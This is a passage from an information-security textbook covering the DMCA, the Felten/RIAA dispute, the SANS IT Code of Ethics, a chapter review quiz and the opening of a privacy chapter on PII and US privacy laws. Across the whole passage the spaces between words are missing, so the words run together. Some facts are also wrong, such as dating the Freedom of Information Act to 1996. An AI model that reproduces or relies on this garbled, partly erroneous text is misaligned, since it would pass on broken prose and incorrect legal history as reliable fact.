Although,onthesurface,thisseemsareasonablerequirement,themethodsusedinmostcasesarecryptographicinnature,andthisprovisionhadtheabilitytoeliminateand/orseverelylimitresearchintoencryptionandthestrengthsandweaknessesofspecificmethods.ADMCAprovision,Section1201(g),wasincludedtoprovideforspecificreliefandallowexemptionsforlegitimateresearch(seetheTechTipsidebar“DMCAResearchExemptionRequirements”).Withthissection,thelawgarneredindustrysupportfromseveralorganizations,suchastheSoftware&InformationIndustryAssociation(SIIA),RecordingIndustryAssociationofAmerica(RIAA),andMotionPictureAssociationofAmerica(MPAA).Basedontheseinputs,theU.S.CopyrightOfficeissuedareportsupportingtheDMCAinarequiredreporttotheU.S.Congress.ThisseemedtosettletheissuesuntiltheRIAAthreatenedtosueanacademicresearchteamheadedbyProfessorEdwardFeltenfromPrincetonUniversity.Theissuebehindthesuitwasthepotentialpublicationofresultsdemonstratingthatseveralcopyprotectionmethods
wereflawedintheirapplication.Thisresearchcameinresponsetoanindustry-sponsoredchallengetobreakthemethods.Afterbreakingthemethodsdevelopedandpublishedbytheindustry,Feltenandhisteampreparedtopublishtheirfindings.TheRIAAobjectedandthreatenedasuitunderprovisionsoftheDMCA.AfterseveralyearsoflitigationandsupportofFeltenbytheElectronicFrontierFoundation(EFF),thecasewaseventuallyresolvedintheacademicteam’sfavor,althoughnocaselawtopreventfurtherindustry-ledthreatswasdeveloped.OneofthecontroversialissuesassociatedwithDMCAistheissueof
takedownnotices.CarrierssuchasYouTubearegrantedprotectionfromcontentviolation,providedtheyremovethecontentwhenrequestedwithatakedownorder.Thepublishingindustryusesscannersandautomatedsystemstoissuetakedownnotices,andthesesometimesgoawry(seethesidebarontheMarsRovermishap).Theissueoffairuseisonethatisnotdelineatedbybright-lineregulations,makingthesystemonethatsideswiththetakedownrequestorunlessthecontentpostertakesthemtocourt.
MarsRoverCrashedbyDMCANASAmaintainsaYouTubechannelwhereitpostsvideosofspaceevents,suchasthelandingoftheroverCuriosityonthesurfaceofMars.ThecontentwasdevelopedbyNASAwithU.S.taxpayermoney,yetitwasservedatakedownnoticebyScrippsNewsService.Theissuewasremedied,buttaxpayerslostearlycoverageandhadtopaythelegalbillstofightfortheirowncontent.ThishappensonaregularbasistotheNASAchannel,andalthoughthelawhasprovisionsforprosecutingfalsetakedowns,theyarerarelyused.
ExemptionsarescatteredthroughouttheDMCA,althoughmanywerecreatedduringvariousdeliberationsontheactanddonotmakesensewhentheactisviewedinwhole.Theeffectoftheseexemptionsuponpeopleinthesoftwareandtechnologyindustryisnotclear,anduntilrestrainedbycaselaw,theDMCAgiveslargefirmswithdeeplegalpocketsapotentweapontouseagainstpartieswhodiscloseflawsinencryptiontechnologiesusedinvariousproducts.Actionshavealreadybeeninitiatedagainstindividualsandorganizationswhohavereportedsecurityholesinproducts.Thiswillbeanactiveareaoflegalcontention,astherealissuesbehinddigitalrightsmanagementhaveyettobetruly
resolved.
EthicsEthicshasbeenasubjectofstudybyphilosophersforcenturies.Itmightbesurprisingtonotethatethicsassociatedwithcomputersystemshasahistorydatingbacktothebeginningofthecomputingage.Thefirstexaminationofcybercrimeoccurredinthelate1960s,whentheprofessionalconductofcomputerprofessionalswasexaminedwithrespecttotheiractivitiesintheworkplace.Ifweconsiderethicalbehaviortobeconsistentwiththatofexistingsocialnorms,itcanbefairlyeasytoseewhatisconsideredrightandwrong.Butwiththeglobalizationofcommerce,andtheglobalizationofcommunicationsviatheInternet,questionsareraisedonwhatistheappropriatesocialnorm.Culturalissuescanhavewide-rangingeffectsonthis,andalthoughtheideaofanappropriatecodeofconductfortheworldisappealing,itisasyetanunachievedobjective.Theissueofglobalizationhassignificantlocaleffects.Ifauserwishes
toexpressfreespeechviatheInternet,isthisprotectedbehaviororcriminalbehavior?Differentlocaleshavedifferentsetsoflawstodealwithitemssuchasfreespeech,withsomerecognizingtheright,andothersprohibitingit.Withtheglobalizationofbusiness,whataretheappropriatecontrolsforintellectualpropertywhensomeregionssupportthisright,whileothersdonotevenrecognizeintellectualpropertyassomethingofvalue,butrathersomethingownedbythecollectiveofsociety?Thechallengeintoday’sbusinessenvironmentistoestablishandcommunicateacodeofethicssothateveryoneassociatedwithanenterprisecanunderstandthestandardsofexpectedperformance.Agreatsourceofbackgroundinformationonallthingsassociatedwith
computersecurity,theSANSInstitutepublishedasetofITethicalguidelines(“ITCodeofEthics”)inApril2004:seewww.sans.org/security-resources/ethics.php.
TechTip
ITCodeofEthics
SANSInstituteITCodeofEthics,1Version1.0,April24,2004:Iwillstrivetoknowmyselfandbehonestaboutmycapability.
IwillstrivefortechnicalexcellenceintheITprofessionbymaintainingandenhancingmyownknowledgeandskills.IacknowledgethattherearemanyfreeresourcesavailableontheInternetandaffordablebooksandthatthelackofmyemployer’strainingbudgetisnotanexcusenorlimitsmyabilitytostaycurrentinIT.
WhenpossibleIwilldemonstratemyperformancecapabilitywithmyskillsviaprojects,leadership,and/oraccreditededucationalprogramsandwillencourageotherstodosoaswell.
Iwillnothesitatetoseekassistanceorguidancewhenfacedwithataskbeyondmyabilitiesorexperience.Iwillembraceotherprofessionals’adviceandlearnfromtheirexperiencesandmistakes.Iwilltreatthisasanopportunitytolearnnewtechniquesandapproaches.Whenthesituationarisesthatmyassistanceiscalledupon,Iwillrespondwillinglytosharemyknowledgewithothers.
Iwillstrivetoconveyanyknowledge(specialistorotherwise)thatIhavegainedtootherssoeveryonegainsthebenefitofeachother’sknowledge.
IwillteachthewillingandempowerotherswithIndustryBestPractices(IBP).Iwilloffermyknowledgetoshowothershowtobecomesecurityprofessionalsintheirownright.Iwillstrivetobeperceivedasandbeanhonestandtrustworthyemployee.
Iwillnotadvanceprivateinterestsattheexpenseofendusers,colleagues,ormyemployer.
Iwillnotabusemypower.Iwillusemytechnicalknowledge,userrights,andpermissionsonlytofulfillmyresponsibilitiestomyemployer.
Iwillavoidandbealerttoanycircumstancesoractionsthatmightleadtoconflictsofinterestortheperceptionofconflictsofinterest.Ifsuchcircumstanceoccurs,Iwillnotifymyemployerorbusinesspartners.
Iwillnotstealproperty,timeorresources.
Iwillrejectbriberyorkickbacksandwillreportsuchillegalactivity.Iwillreportontheillegalactivitiesofmyselfandotherswithoutrespecttothepunishmentsinvolved.Iwillnottoleratethosewholie,steal,orcheatasameansofsuccessinIT.
IwillconductmybusinessinamannerthatassurestheITprofessionisconsideredoneofintegrityandprofessionalism.
Iwillnotinjureothers,theirproperty,reputation,oremploymentbyfalseormaliciousaction.
Iwillnotuseavailabilityandaccesstoinformationforpersonalgainsthroughcorporateespionage.
Idistinguishbetweenadvocacyandengineering.Iwillnotpresentanalysisandopinionasfact.
IwilladheretoIndustryBestPractices(IBP)forsystemdesign,rollout,hardeningandtesting.
Iamobligatedtoreportallsystemvulnerabilitiesthatmightresultinsignificantdamage.
Irespectintellectualpropertyandwillbecarefultogivecreditforother’swork.Iwillneverstealormisusecopyrighted,patentedmaterial,tradesecretsoranyotherintangibleasset.
IwillaccuratelydocumentmysetupproceduresandanymodificationsIhavedonetoequipment.ThiswillensurethatotherswillbeinformedofproceduresandchangesI’vemade.
Irespectprivacyandconfidentiality.
Irespecttheprivacyofmyco-workers’information.Iwillnotperuseorexaminetheirinformationincludingdata,files,records,ornetworktrafficexceptasdefinedbytheappointedroles,theorganization’sacceptableusepolicy,asapprovedbyHumanResources,andwithoutthepermissionoftheenduser.
Iwillobtainpermissionbeforeprobingsystemsonanetworkforvulnerabilities.Irespecttherighttoconfidentialitywithmyemployers,clients,andusersexceptasdictatedbyapplicablelaw.Irespecthumandignity.
Itreasureandwilldefendequality,justiceandrespectforothers.Iwillnotparticipateinanyformofdiscrimination,whetherduetorace,color,nationalorigin,ancestry,sex,sexualorientation,gender/sexualidentityorexpression,maritalstatus,creed,religion,age,disability,veteran’sstatus,orpoliticalideology.
1©2000–2015TheSAN™Institute.Reprintedwithpermission.
Chapter24Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingregardingthebasicsoflegalandethicalconsiderationsassociatedwithinformationsecurity.
Explainthelawsandrulesconcerningimportingandexportingencryptionsoftware
Importandexportofhigh-strengthcryptographicsoftwareiscontrolledinmanycountries,includingtheUnitedStates.
Possessionofencryptionprogramsorencrypteddatacanbeacrimeinmanycountries.
TheWassenaarArrangementisaninternationalagreementbetweencountriesconcerningtheimport/exportofcryptographicsoftwareandhasenabledmass-marketedproductstogenerallyflowacrossborders.
Identifythelawsthatgoverncomputeraccessandtrespass
Gainingunauthorizedaccess,bywhatevermeans,includingusingsomeoneelse’scredentials,iscomputertrespass.
Exceedinggrantedauthorityisalsocomputertrespass.
Manynationshaveversionsofcomputertrespassormisusestatutes,althoughtheterminologyvariesgreatlyamongcountries.
Identifythelawsthatgovernencryptionanddigitalrightsmanagement
Encryptiontechnologyisusedtoprotectdigitalrightsmanagementandpreventunauthorizeduse.
CircumventingtechnologicalcontrolsusedtoprotectintellectualpropertyisaviolationoftheDMCA.
Insomecountries,carryingencrypteddatacanresultinauthoritiesdemandingthekeysorthreateningprosecutionforfailuretodisclosethekeys.
Describethelawsthatgoverndigitalsignatures
Digitalsignatureshavethesamelegalstatusaswrittensignatures.
DigitalsignaturesusePINsorother“secrets”thatrequireend-usersafeguardingtobeprotectedfromfraud.
Exploreethicalissuesassociatedwithinformationsecurity
Ethicsisthesocial–moralenvironmentinwhichapersonmakesdecisions.
Ethicscanvarybysocio-culturalfactorsandgroups.
KeyTermsadministrativelaw(698)caselaw(698)clickfraud(697)commonlaw(698)ComputerFraudandAbuseAct(CFAA)(701)computertrespass(699)DigitalMillenniumCopyrightAct(DMCA)(709)ElectronicCommunicationsPrivacyAct(ECPA)(700)Gramm-Leach-BlileyAct(GLBA)(702)PaymentCardIndustryDataSecurityStandard(PCIDSS)(703)Sarbanes-OxleyAct(SOX)(703)Section404(703)statutorylaw(698)StoredCommunicationsAct(SCA)(700)
WassenaarArrangement(705)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.ITcontrolsweremandatedinpubliccompaniesby_______________,partoftheSarbanes-OxleyAct.
2.Thecontractualsetofrulesgoverningcreditcardsecurityisthe_______________.
3.Acatchalllawtoprosecutehackersisthestatuteon_______________.
4.The_______________istheprimaryU.S.federallawoncomputerintrusionandmisuse.
5.Thepowerofgovernment-sponsoredagenciesliesin_______________.
6.A(n)_______________ispassedbyalegislativebranchofgovernment.
7._______________comesfromthejudicialbranchofgovernment.
Multiple-ChoiceQuiz1.YourSocialSecuritynumberandotherassociatedfactskeptbyyour
bankareprotectedbywhatlawagainstdisclosure?
A.TheSocialSecurityActof1934
B.TheUSAPatriotActof2001
C.TheGramm-Leach-BlileyAct
D.HIPAA
2.BreakingintoanothercomputersystemintheUnitedStates,evenifyoudonotcauseanydamage,isregulatedbywhatlaw?
A.Statelaw,asthedamageisminimal
B.FederallawundertheIdentityTheftandAssumptionDeterrenceAct
C.FederallawundertheElectronicCommunicationsPrivacyAct(ECPA)of1986
D.FederallawundertheUSAPatriotActof2001
3.Exportofencryptionprogramsisregulatedbywhichentity?A.U.S.StateDepartment
B.U.S.CommerceDepartment
C.U.S.DepartmentofDefense
D.NationalSecurityAgency
4.FortheFBItoinstallandoperateCarnivoreonanISP’snetwork,whatisrequired?
A.Acourtorderspecifyingspecificitemsbeingsearchedfor
B.AnofficialrequestfromtheFBI
C.AnimpactstatementtoassessrecoverablecoststotheISP
D.AwrittenrequestfromanISPtoinvestigateacomputertrespassincident
5.Trueorfalse:Asysadminwhoisreadingemployeee-mailtolookforevidenceofsomeonestealingcompanypasswordsisprotectedbythecompany-ownedequipmentexemptiononeavesdropping.
A.False,thereisno“company-ownedexemption.”
B.True,providedheorshehashisorhermanager’sapproval.
C.True,providedheorshehasseniormanagementpermissioninwriting.
D.True,ifitisinhisorherjobdescription.
6.Trueorfalse:WritingvirusesandreleasingthemacrosstheInternetisaviolationoflaw.
A.Alwaystrue.Allcountrieshavereciprocalagreementsunderinternationallaw.
B.Partiallytrue.Dependsonthelawsinthecountryoforigin.
C.False.Computersecuritylawsdonotcrossinternationalboundaries.
D.Partiallytrue.Dependsonthespecificcountriesinvolved,bothofthevirusauthorandtherecipient.
7.Publicationofflawsinencryptionusedforcopyprotectionisapotentialviolationof:
A.HIPAA
B.U.S.CommerceDepartmentregulations
C.DMCA
D.NationalSecurityAgencyregulations
8.Circumventingtechnologicalcontrolstopreventreverse-engineeringisaviolationof:
A.HIPAA
B.DMCA
C.ECPA
D.Alloftheabove
9.Logginginasyourbosstofixyourtimerecordsis:A.OK,ifyouareaccuratelyreportingyourtime
B.OneoftheobscureelementsofDMCA
C.AviolationoftheSeparationofDutiesLaw
D.Aformofcomputertrespass
10.YouarearrestedasaresultofyourhackingactivitiesandinvestigatorsfindyouhavebeenbreakingpasswordfilesandsharingthemacrosstheInternet.Whichlawhaveyouviolated?
A.CFAA
B.ECPA
C.DMCA
D.HIPAA
EssayQuiz1.YouarebeinghiredasthedirectorofITforasmallfirmthatdoes
retailtradebusiness,andyouwillbethesourceofknowledgeforallthingsIT,includingsecurityandlegalregulations.Outlinethelegalelementsyouwouldwanttohavepolicycovering,andincludehowyouwoulddisseminatethisinformation.
2.Youhavejustbeenhiredasasystemadministratorforasmallcollege.Thecollege’sserversareusedfordatabasestorageandawebsitethatservesthecollegecommunity.Describethelawsthatwillpotentiallyimpactyourjobwithrespecttocomputersecurity.Whatactionswillyoutaketoensurecompliancewithlawsandregulations?
chapter25 Privacy
Theywhowouldgiveupanessentiallibertyfortemporarysecurity,deserveneitherlibertyorsecurity.
T
—BENJAMINFRANKLIN
Inthischapter,youwilllearnhowto
Defineprivacy
Identifyprivacylawsrelativetocomputersecurityinvariousindustries
Describeissuesassociatedwithtechnologyandprivacy
Explaintheconceptofpersonallyidentifiableinformation(PII)
Craftaprivacypolicyforonlinerecords
Recognizeweb-relatedprivacyissues
headventofinterconnectedcomputersystemshasenabledbusinessesandgovernmentstoshareandintegrateinformation.Thishasledtoaresurgenceintheimportanceofprivacylawsworldwide.Governments
inEuropeandtheUnitedStateshavetakendifferentapproachesinattemptstocontrolprivacyvialegislation.Asanewgenerationgrowsupinadigitalworld,itsviewofinformationsharingservices,suchassocialnetworkingsites,hascreatedashiftinhowpeopleviewprivacy.Manysocialandphilosophicaldifferenceshaveledtothedifferingviewsonprivacy,butastheworldbecomesinterconnected,understandingandresolvingthemwillbeimportant.Privacycanbedefinedasthepowertocontrolwhatothersknowabout
youandwhattheycandowiththatinformation.Inthecomputerage,personalinformationformsthebasisformanydecisions,fromcreditcardtransactionstopurchasegoodstotheabilitytobuyanairplaneticketandfly.Althoughitistheoreticallypossibletoliveanalmostanonymousexistencetoday,thepricefordoingsoishigh—fromhigherpricesatthegrocerystore(nofrequentshopperdiscount),tohighercreditcosts,tochallengeswithairtravel,openingbankaccounts,andseekingemployment.Informationisanimportantitemintoday’ssociety.Frominstantcredit,todigitalaccesstoawiderangeofinformationviatheInternet,toelectronic
serviceportalssuchase-commercesites,e-governmentsites,andsoon,ourdailyliveshavebecomeintertwinedwithprivacyissues.Informationhasbecomeavaluableentity,foritisanenablerofmanyfunctions.Afewhundredyearsago,ifsomeonewantedtoprocureownershipofanitem,hewouldtypicallytradesomethingoftangiblevalue(forexample,coins)withthecurrentowneroftheitem,andanexchangewouldtakeplace.Thetwoparties,buyerandseller,wouldhavetomeetinspaceandtimeandconductatransaction.Or,insomecases,theywouldemployathird-partyagenttoactasaproxyanddothetransactionforthem.Today,onewouldgoonline,searchforthebestdeal(information-centric),conductbusinessviae-commerce(usecomputerprogramsasagents),payfortheitemviabankcardtransaction(informationexchangeconcerningfundsavailabilityandtransfer),and,insomecases,receivedeliverydigitally(inthecaseofsoftware,books,videos,andsoforth).Thecreationofaninformation-centriceconomyisasdramaticarevolutionastheadoptionofmoneytoactasaneconomicutility,simplifyingbartering.Thisrevolutionandrelianceoninformationimbuesinformationwithvalue,creatingtheneedtoprotectit.
Privacyistherighttocontrolinformationaboutyouandwhatotherscandowiththatinformation.
PersonallyIdentifiableInformation(PII)Wheninformationisaboutaperson,failuretoprotectitcanhavespecificconsequences.Businesssecretsareprotectedthroughtradesecretlaws,governmentinformationisprotectedthroughlawsconcerningnationalsecurity,andprivacylawsprotectinformationassociatedwithpeople.Asetofelementsthatcanleadtothespecificidentityofapersonisreferredtoaspersonallyidentifiableinformation(PII).Bydefinition,PIIcanbeusedtoidentifyaspecificindividual,evenifanentiresetisnotdisclosed.
AslittleinformationastheZIPcode,gender,anddateofbirthcanresolvetoasingleperson.
PIIisanessentialelementofmanyonlinetransactions,butitcanalsobemisusedifdisclosedtounauthorizedparties.Forthisreason,itshouldbeprotectedatalltimes,byallpartiesthatpossessit.
TechTip
CollectingPIIPIIisbynaturesensitivetoendusers.Lossorcompromiseofend-userPIIcanresultinfinancialandotherimpactsbornebytheenduser.Forthisreason,collectionofPIIshouldbeminimizedtowhatisactuallyneeded.ThreegreatquestionstoaskwhendeterminingwhethertocollectPIIarethese:
DoIneedeachspecificdataelement?Whatismybusinesspurposeforeachspecificelement?
Willmycustomers/endusersagreewithmyrationaleforcollectingeachspecificelement?
TRUSTe(www.truste.com),anindependenttrustauthority,definespersonallyidentifiableinformationasanyinformation…(i)thatidentifiesorcanbeusedtoidentify,contact,orlocatethepersontowhomsuchinformationpertains,or(ii)fromwhichidentificationorcontactinformationofanindividualpersoncanbederived.PersonallyIdentifiableInformationincludes,butisnotlimitedto:name,address,phonenumber,faxnumber,e-mailaddress,financialprofiles,medicalprofile,socialsecuritynumber,andcreditcardinformation.TheconceptofPIIisusedtoidentifywhichdataelementsrequirea
specificlevelofprotection.Whenrecordsareusedindividually(notinaggregateform),thenPIIistheconceptofconnectingasetofdata
elementstoaspecificpurpose.Ifthiscanbeaccomplished,thentheinformationisPIIandneedsspecificprotections.TheU.S.FederalTradeCommission(FTC)hasrepeatedlyruledthatifafirmcollectsPII,itisresponsibleforitthroughtheentirelifecycle,frominitialcollectionthroughuse,retirement,anddestruction.OnlyafterthePIIisdestroyedinallformsandlocationsisthecompany’sliabilityforitscompromiseabated.
SensitivePIISomePIIissosensitivetodisclosureandresultingmisusethatitrequiresspecialhandlingtoensureprotection.Dataelementssuchascreditcarddata,bankaccountnumbers,andgovernmentidentifiers(socialsecuritynumber,driver’slicensenumber,andsoon)requireextralevelsofprotectiontopreventharmfrommisuse.Shouldtheseelementsbelostorcompromised,direct,personalfinancialdamagemayoccurtothepersonidentifiedbythedata.TheseelementsneedspecialattentionwhenplanningdatastoresandexecutingbusinessprocessesassociatedwithPIIdata,includingcollection,storage,anddestruction.
TryThis!SearchforYourOwnPIIModernInternetsearchengineshavetheabilitytocatalogtremendousquantitiesofinformationandmakewide-areasearchesforspecificelementseasy.UsingyourownelementsofPII,trysearchingtheInternetandseewhatisreturnedonyourname,address,phonenumber,socialsecuritynumber,dateofbirth,andsoforth.Forsecurityreasons,besuretobeanonymouswhendoingthis—thatis,logoutofGoogleapplicationsbeforeusingGoogleSearch,Microsoft/LiveapplicationsbeforeusingBing,orYahooapplicationsbeforeusingYahooSearch.Thisstepmayseemminor,butwithsearchrecordsbeingstored,thelastthingyouwanttodoisproviderecordsthatcancross-correlatedataaboutyourself.Ifyoufinddataonyourself,analyzethesourceandwhetherornotthedatashouldbepubliclyaccessible.
Iftheaccidentaldisclosureofuserdatacouldcausetheuserharm,suchasdiscrimination(political,racial,healthrelated,orlifestyle),thenthebest
courseofactionistotreattheinformationassensitivePII.
Notice,Choice,andConsentAsprivacyisdefinedasthepowertocontrolwhatothersknowaboutyouandwhattheycandowiththisinformation,andPIIrepresentsthecoreitemsthatshouldbecontrolled,communicationwiththeenduserconcerningprivacyisparamount.Privacypoliciesarepresentedlaterinthechapter,butwithrespecttoPII,threewordscangoverngoodcitizenrywhencollectingPII.NoticereferstoinformingthecustomerthatPIIwillbecollectedandusedand/orstored.Choicereferstotheopportunityfortheendusertoconsenttothedatacollectionortooptout.Consentreferstothepositiveaffirmationbyacustomerthatshereadthenotice,understandsherchoices,andagreestoreleaseherPIIforthepurposesexplainedtoher.
U.S.PrivacyLawsIdentityprivacyandtheestablishmentofidentitytheftcrimesisgovernedbytheIdentityTheftandAssumptionDeterrenceAct,whichmakesitaviolationoffederallawtoknowinglyuseanother’sidentity.ThecollectionofinformationnecessarytodothisisalsogovernedbytheGramm-Leach-BlileyAct(GLBA),whichmakesitillegalforsomeonetogatheridentityinformationonanotherpersonunderfalsepretenses.Intheeducationarea,privacylawshaveexistedforyears(see“FamilyEducationRecordsandPrivacyAct(FERPA),”laterinthechapter).
TechTip
MajorElementsofthePrivacyActThePrivacyActhasnumerousrequiredelementsanddefinitions.Amongotherthings,themajorelementsrequirefederalagenciesto
PublishintheFederalRegisteranoticeofeachsystemofrecordsthatitmaintains,includinginformationaboutthetypeofrecordsmaintained,thepurposesforwhichtheyareused,andthecategoriesofindividualsonwhomtheyaremaintained.
Maintainonlysuchinformationaboutanindividualasrequiredbylaw,orisneededtoperformastatutoryduty.
Maintaininformationinatimely,accurate,relevant,secure,andcompleteform.
InformindividualsaboutaccesstoPIIuponinquiry.Notifyindividualsfromwhomitrequestsinformationwhatauthorizesittorequesttheinformation;whetherdisclosureismandatoryorvoluntary;thepurposeforwhichtheinformationmaybeused;andpenaltiesfornotprovidingtherequestedinformation.
Establishappropriatephysical,technical,andadministrativesafeguardsfortheinformationthatiscollectedandused.
Additionalelementscanbefoundbyexaminingprovisionsoftheactitself,althoughitisdraftedinlegislativeformandrequiresextensivecross-referencingandinterpretation.
AtaskforcefromtheDepartmentofHealth,Education,andWelfare(HEW),developedtheCodeofFairInformationPractices,consistingoffiveclauses:openness,disclosure,secondaryuse,correction,andsecurity.Thesemainsubjectscontinuetodayasthecoreofmanyprivacypractices.TwomajorprivacyinitiativesfollowedfromtheU.S.government,thePrivacyActof1974andtheFreedomofInformationActof1996.
PrivacyActof1974ThePrivacyActof1974wasanomnibusactdesignedtoaffecttheentirefederalinformationlandscape.Thisacthasmanyprovisionsthatapplyacrosstheentirefederalgovernment,withonlyminorexceptionsfornationalsecurity(classifiedinformation),lawenforcement,andinvestigativeprovisions.Thisacthasbeenamendednumeroustimes,andyoucanfindcurrent,detailedinformationattheElectronicPrivacyInformationCenter(EPIC)website,http://epic.org/privacy/laws/privacy_act.html.
FreedomofInformationAct(FOIA)
TheFreedomofInformationAct(FOIA)of1996isoneofthemostwidelyusedprivacyactsintheUnitedStates,somuchsothatitsacronym,FOIA(pronounced“foya”),hasreachedcommonuse.FOIAwasdesignedtoenablepublicaccesstoU.S.governmentrecords,and“public”includesthepress,whichpurportedlyactsonthepublic’sbehalfandwidelyusesFOIAtoobtaininformation.FOIAcarriesapresumptionofdisclosure;theburdenisonthegovernment,nottherequestingparty,tosubstantiatewhyinformationcannotbereleased.Uponreceivingawrittenrequest,agenciesoftheU.S.governmentarerequiredtodisclosethoserecords,unlesstheycanbelawfullywithheldfromdisclosureunderoneofninespecificexemptionsinFOIA.Therightofaccessisultimatelyenforceablethroughthefederalcourtsystem.Theninespecificexemptions,listedinSection552ofU.S.CodeTitle5,fallwithinthefollowinggeneralcategories:1.Nationalsecurityandforeignpolicyinformation2.Internalpersonnelrulesandpracticesofanagency3.Informationspecificallyexemptedbystatute4.Confidentialbusinessinformation5.Inter-orintra-agencycommunicationthatissubjecttodeliberative
process,litigation,andotherprivileges
6.Informationthat,ifdisclosed,wouldconstituteaclearlyunwarrantedinvasionofpersonalprivacy
7.Lawenforcementrecordsthatimplicateoneofasetofenumeratedconcerns
8.Agencyinformationfromfinancialinstitutions9.Geologicalandgeophysicalinformationconcerningwells
FOIAisfrequentlyusedandgeneratesatremendousamountofworkformanyfederalagencies,
resultingindelaystorequests.Thisinitselfisatestamenttoitseffectiveness.
RecordavailabilityunderFOIAislessofanissuethanisthebacklogofrequests.Todefraysomeofthecostsassociatedwithrecordrequests,andto
preventnumeroustrivialrequests,agenciesareallowedtochargeforresearchtimeandduplicationcosts.Thesecostsvarybyagency,butaretypicallynominal,intherangeof$8.00to$45.00perhourforsearch/reviewfeesand$.10to$.35perpageforduplication.Agenciesarenotallowedtodemandarequestertomakeanadvancepaymentunlesstheagencyestimatesthatthefeeislikelytoexceed$250ortherequesterpreviouslyfailedtopayproperfees.Formanyuses,thefirst100pagesarefree,andundersomecircumstancesthefeescanbewaived.
FamilyEducationRecordsandPrivacyAct(FERPA)StudentrecordshavesignificantprotectionsundertheFamilyEducationRecordsandPrivacyActof1974,whichincludessignificantrestrictionsoninformationsharing.FERPAoperatesonanopt-inbasis,asthestudentmustapprovethedisclosureofinformationpriortotheactualdisclosure.FERPAwasdesignedtoprovidelimitedcontroltostudentsovertheireducationrecords.Thelawallowsstudentstohaveaccesstotheireducationrecords,anopportunitytoseektohavetherecordsamended,andsomecontroloverthedisclosureofinformationfromtherecordstothirdparties.Forexample,iftheparentofastudentwhois18orolderinquiresaboutthestudent’sschedule,grades,orotheracademicissues,thestudenthastogivepermissionbeforetheschoolcancommunicatewiththeparent,eveniftheparentispayingfortheeducation.FERPAisdesignedtoprotectprivacyofstudentinformation.AttheK–
12schoollevel,studentsaretypicallytooyoungtohavelegalstandingassociatedwithexercisingtheirrights,soFERPArecognizestheparentsaspartoftheprotectedparty.FERPAprovidesparentswiththerightto
inspectandreviewtheirchildren’seducationrecords,therighttoseektoamendinformationintherecordstheybelievetobeinaccurate,misleading,oraninvasionofprivacy,andtherighttoconsenttothedisclosureofPIIfromtheirchildren’seducationrecords.Whenastudentturns18yearsoldorentersapostsecondaryinstitutionatanyage,theserightsunderFERPAtransferfromthestudent’sparentstothestudent.
U.S.ComputerFraudandAbuseAct(CFAA)TheU.S.ComputerFraudandAbuseAct(asamendedin1994,1996,2001,and2008)andprivacylawssuchastheEUDataProtectionDirectivehaveseveralspecificobjectives,butoneofthemainonesistopreventunauthorizedpartiesaccesstoinformationtheyshouldnothaveaccessto.Fraudulentaccess,orevenexceedingone’sauthorizedaccess,isdefinedasacrimeandcanbepunished.AlthoughtheCFAAisintendedforbroaderpurposes,itcanbeusedtoprotectprivacyrelatedtocomputerrecordsthroughitsenforcementofviolationsofauthorizedaccess.
CrossCheckCFAAandDataProtectionDirectivesandPrivacyIssuesTheprimarypurposeofthesesweepingactsistoprovideasimpletoolforlawenforcementtoprosecutecriminalswhoattempttoaccesssystemstogainaccesstodataandinformation.Whenthisresultsinaprivacyviolation,theoriginalcomputertrespassviolationstillexistsandisprosecutable.Whatevidencewouldasysadminneedtoproducetodemonstrateaviolationassociatedwithcomputertrespass?AdditionalinformationontheselawsisinChapter24.
U.S.Children’sOnlinePrivacyProtectionAct(COPPA)ChildrenlackthementalcapacitytomakeresponsibledecisionsconcerningthereleaseofPII.TheU.S.Children’sOnlinePrivacyProtectionActof1998(COPPA)specificallyaddressesthisprivacyissue
withrespecttochildrenaccessingandpotentiallyreleasinginformationontheInternet.Anywebsitethatcollectsinformationfromchildren(ages13andunder),evensimplewebformstoallowfollow-upcommunicationsandsoforth,iscoveredbythislaw.Beforeinformationcanbecollectedandused,parentalpermissionneedstobeobtained.Thisactrequiresthatsitesobtainparentalpermission,postaprivacypolicydetailingspecificsconcerninginformationcollectedfromchildren,anddescribehowthechildren’sinformationwillbeused.
VideoPrivacyProtectionAct(VPPA)ConsideredbymanyprivacyadvocatestobethestrongestU.S.privacylaw,theVideoPrivacyProtectionActof1988providescivilremediesagainstunauthorizeddisclosureofpersonalinformationconcerningvideotaperentalsand,byextension,DVDsandgamesaswell.Thisisafederalstatute,craftedinresponsetomediasearchesofrentalrecordsassociatedwithJudgeBorkwhenhewasnominatedtotheU.S.SupremeCourt.Congress,upsetwiththeliberalreleaseofinformation,reactedwithlegislation,draftedbySenatorLeahy,whonotedduringthefloordebatethatnewprivacyprotectionsarenecessaryin“aneraofinteractivetelevisioncables,thegrowthofcomputercheckingandcheck-outcounters,ofsecuritysystemsandtelephones,alllodgedtogetherincomputers....”(S.Rep.No.100-599,100thCong.,2dSess.at6(1988)).Thisstatute,civilinnature,providesforcivilpenaltiesofupto$2500
peroccurrence,aswellasothercivilremedies.Thestatuteprovidestheprotectionsbydefault,thusrequiringavideorentalcompanytoobtaintherenter’sconsenttooptoutoftheprotectionsifthecompanywantstodisclosepersonalinformationaboutrentals.Exemptionsexistforissuesassociatedwiththenormalcourseofbusinessforthevideorentalcompanyaswellasforrespondingtowarrants,subpoenas,andotherlegalrequests.Thislawdoesnotsupersedestatelaws,ofwhichthereareseveral.Manystateshaveenactedlawsprovidingbothwiderandgreater
protectionsthanthefederalVPPAstatute.Forexample,Connecticutand
Marylandlawsbrandvideorentalrecordsasconfidential,andthereforenotsubjecttosale,whileCalifornia,Delaware,Iowa,Louisiana,NewYork,andRhodeIslandhaveadoptedstatestatutesprovidingprotectionofprivacywithrespecttovideorentalrecords.Michigan’svideoprivacylawisassweepingasitsbroadsuper-DMCAstatestatute.Thisstatelawspecificallyprotectsrecordsofbookpurchases,rentals,andborrowingaswellasvideorentals.
